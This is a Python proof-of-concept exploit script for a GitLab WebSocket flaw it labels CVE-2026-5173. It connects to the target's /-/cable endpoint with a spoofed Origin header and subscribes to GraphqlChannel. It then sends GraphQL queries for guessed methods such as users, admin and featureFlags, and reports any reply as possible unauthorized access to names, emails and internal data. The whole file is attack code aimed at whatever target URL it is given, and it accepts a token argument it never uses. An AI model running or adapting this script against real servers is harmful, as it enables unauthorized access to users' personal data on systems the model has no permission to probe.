#!/usr/bin/env python3 import asyncio import json import sys import argparse import websockets async def run_poc(target, token=None): print(f"[+] CVE-2026-5173 PoC v2 - Target: {target}") if not target.startswith(("http://", "https://")): target = "http://" + target ws_url = target.replace("http://", "ws://").replace("https://", "wss://") + "/-/cable" headers = {"Origin": target} try: async with websockets.connect(ws_url, extra_headers=headers) as ws: print("[+] WebSocket connected") # Subscribe to GraphqlChannel (primary vulnerable channel) await ws.send(json.dumps({ "command": "subscribe", "identifier": json.dumps({"channel": "GraphqlChannel"}) })) print("[+] Subscribed to GraphqlChannel") # Wait for subscription confirmation await asyncio.sleep(1) # List of likely unintended methods (based on GitLab internals + CVE description) test_methods = [ "currentUser", "viewer", "project", "projects", "users", "namespaces", "instanceStatistics", "admin", "getInternalData", "export", "query", "execute", "mutation", "gitlabInternal", "featureFlags" ] for method in test_methods: print(f"[*] Testing method: {method}") query = f'query {{ {method} {{ id name email }} }}' if method in ["currentUser", "viewer"] else \ f'query {{ {method} {{ nodes {{ id name }} }} }}' payload = { "command": "message", "identifier": json.dumps({"channel": "GraphqlChannel"}), "data": json.dumps({ "action": "execute", "query": query, "variables": {} }) } await ws.send(json.dumps(payload)) try: response = await asyncio.wait_for(ws.recv(), timeout=5) if "data" in response or "result" in response: print(f"[SUCCESS] Possible unauthorized access via '{method}'!") print(f" → Response: {response[:300]}...\n") else: print(f" Response received (check manually)\n") except asyncio.TimeoutError: print(f" No response (timeout)\n") except Exception as e: print(f"[-] Connection error: {e}") def main(): parser = argparse.ArgumentParser(description="CVE-2026-5173 GitLab WebSocket PoC v2") parser.add_argument("target", help="Target URL e.g. http://192.168.1.100:8080") parser.add_argument("-t", "--token", help="GitLab Personal Access Token (optional)") args = parser.parse_args() asyncio.run(run_poc(args.target, args.token)) if __name__ == "__main__": main()